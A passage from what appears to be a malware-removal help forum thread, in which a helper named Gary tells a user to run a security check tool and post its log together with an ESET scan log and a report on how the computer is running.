  • Select Run. Note: If you receive an error message saying UNSUPPORTED OPERATING SYSTEM! ABORTED!, reboot your computer and attempt to run it again.
  • Allow the program to run
  • A Notepad document will open on your desktop. Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • ESET log
  • Security Check log
  • How is your computer running?

Gary
 